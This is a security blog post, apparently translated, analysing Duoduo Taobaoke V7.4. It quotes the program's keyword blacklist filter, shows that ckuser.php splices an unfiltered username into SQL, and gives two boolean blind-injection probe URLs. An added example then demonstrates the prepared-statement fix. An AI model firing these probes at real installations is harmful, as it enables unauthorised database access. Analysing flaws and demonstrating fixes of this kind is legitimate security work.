Duoduo Taobaoke V7.4: bypassing the anti-injection filter, plus an injection vulnerability

Since the program is open source, I downloaded it and had a look. The programmers actually do have some security awareness. Here is the anti-injection code:

    // illegal characters to be filtered
    $ArrFiltrate = array(
        "#union#i", "#<script#i", "#/script>#i", "#select#i", "#alert#i",
        "#javascript#i", "#<table#i", "#<td#i", "#\"#i", "#\'#i", "#delete#i",
        "#vbscript#i", "#applet#i", "#frame#i", "#<div#i", "#update#i", "#'#i",
        "#union #i", "#select #i", "#delete #i", "#update #i", "#and #i", "#;#i",
        "#update#i"
    );
    $replacements = '';

    // Recursively run the blacklist over every value of a superglobal array.
    function FunStringExist(&$array, $ArrFiltrate, $replacements) {
        if (is_array($array)) {
            foreach ($array as $key => $value) {
                if (is_array($value))
                    FunStringExist($array[$key], $ArrFiltrate, $replacements);
                else
                    $array[$key] = preg_replace($ArrFiltrate, $replacements, $value);
            }
        }
    }
    FunStringExist($_GET, $ArrFiltrate, $replacements);
    FunStringExist($_POST, $ArrFiltrate, $replacements);

This code is still somewhat flawed: it only filters $_GET and $_POST, so we only need to find the places that read the request through $_REQUEST instead. Another file does not call the anti-injection code at all, which results in a string injection (subject to magic_quotes_gpc). This is ckuser.php:

    header("Content-Type:text/html;charset=utf-8");
    include "comm/config.php";
    $uname = trim($_GET["name"]);
    if ($uname == '') {
        echo "true";
    } else {
        $con = @mysql_connect("$dbserver", "$dbuser", "$dbpass") or die(ERR_DB);
        mysql_select_db("$dbname", $con) or die("can not choose the dbname!");
        // the user-controlled name is spliced straight into the query
        $query = "select * from " . $BIAOTOU . "user where ddusername='" . $uname . "'";
        mysql_query("set names utf8");
        $res = mysql_query($query);
        if (mysql_num_rows($res) != 0) {
            echo "true";
        } else {
            echo "false";
        }
    }

First register a user so that the check has something to match:

    ckuser.php?name=maxadd' and 1=1 and ''='    returns true
    ckuser.php?name=maxadd' and 1=2 and ''='    returns false

Original: http://hi.baidu测试数据/0x7362/blog/item/4bab6a2fba63a765ac34de0c.html
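The fix for ckuser.php is to stop concatenating the username into SQL. The following is an added example, not code from Duoduo Taobaoke: it puts the page's concatenated query next to a prepared-statement version and runs the two probes quoted above against an in-memory SQLite database (table name dduser, column ddusername and the sample row are constructed here; the real table prefix in $BIAOTOU is not known).

```php
<?php
// Added example, not the project's code. Uses PDO with in-memory SQLite so it
// runs stand-alone; table name, column name and the sample row are constructed.

function openTestDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE dduser (id INTEGER PRIMARY KEY, ddusername TEXT NOT NULL)");
    $db->exec("INSERT INTO dduser (ddusername) VALUES ('maxadd')"); // constructed sample row
    return $db;
}

// Vulnerable form, as in ckuser.php: the name is spliced into the SQL text,
// so quotes and "and 1=1" in the input become part of the query.
function userExistsConcat(PDO $db, string $uname): bool {
    $query = "select * from dduser where ddusername='" . $uname . "'";
    return $db->query($query)->fetch() !== false;
}

// Hardened form: the name is bound as a parameter. The database compares the
// whole string as a literal value, so no part of it is parsed as SQL.
function userExistsPrepared(PDO $db, string $uname): bool {
    $stmt = $db->prepare("SELECT 1 FROM dduser WHERE ddusername = :name LIMIT 1");
    $stmt->execute([':name' => $uname]);
    return $stmt->fetchColumn() !== false;
}

$db = openTestDb();
$probes = [
    "maxadd",                      // legitimate lookup
    "maxadd' and 1=1 and ''='",    // the two probes quoted on the page
    "maxadd' and 1=2 and ''='",
];
foreach ($probes as $p) {
    printf("%-28s concat=%-5s prepared=%s\n", $p,
        var_export(userExistsConcat($db, $p), true),
        var_export(userExistsPrepared($db, $p), true));
}
```

With the concatenated query the two probes answer true and false respectively, which is exactly the boolean oracle the page describes; with the prepared statement both answer false, because no user is literally named that, and only the plain "maxadd" lookup returns true.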